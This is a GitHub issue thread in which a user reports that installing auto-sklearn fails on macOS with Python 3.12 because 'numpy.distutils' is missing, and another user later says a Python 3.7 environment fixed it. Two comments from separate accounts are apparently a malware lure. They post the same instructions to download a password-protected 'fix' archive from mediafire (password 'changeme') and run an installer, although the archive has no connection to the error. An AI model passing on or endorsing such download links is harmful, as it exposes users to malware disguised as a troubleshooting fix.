### ISSUE TITLE
[Question] pyproject.toml errors on MacOS

### ISSUE THREAD

**Issue by nicholastscott** [automl/auto-sklearn#1738]
# Question Description
Are these build errors unique to me and my lack of other dependencies or has anyone seen similar feedback?
I understand macOS is not officially supported, so any assistance is more than enough. Even referring me to a related closed issue would be awesome.

#Steps/Code to Reproduce
`pip3 install auto-sklearn`
* Output Snippet:

```
Collecting scikit-learn<0.25.0,>=0.24.0 (from auto-sklearn)
  Using cached scikit-learn-0.24.2.tar.gz (7.5 MB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... error
  error: subprocess-exited-with-error
  
  × Preparing metadata (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [20 lines of output]
      <string>:17: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
      Partial import of sklearn during the build process.
Traceback (most recent call last):
        File "/Users/user/Documents/miniconda3/envs/-/lib/python3.12/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 353, in <module>
          main()
        File "/Users/user/Documents/miniconda3/envs/-/lib/python3.12/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 335, in main

```

...

```
  File "/private/var/folders/5g/bpm86cdd5k91xk3s8k2hv5200000gn/T/pip-build-env-ei3s7dpj/overlay/lib/python3.12/site-packages/setuptools/build_meta.py", line 318, in run_setup
          exec(code, locals())
        File "<string>", line 301, in <module>
        File "<string>", line 293, in setup_package
      ModuleNotFoundError: No module named 'numpy.distutils'
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
```

* Already have gcc, swig, and pyrfr successfully installed in this env
* Tried looking at: #1690 and #1670 

# System Details (if relevant)
* python 3.12.4, scikit-learn 1.5.1
* Running on MacOS Ventura

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ImadSaddik** [comment]
I am experiencing the same issue on Ubuntu 24.04 LTS and on Colab.

**Comment by ImadSaddik** [comment]
Hi @nicholastscott. I managed to solve the issue!

I created a new Conda environment with Python 3.7 and ran:

```bash
pip install auto-sklearn
```

At the end, I got a message saying `Successfully built auto-sklearn`.
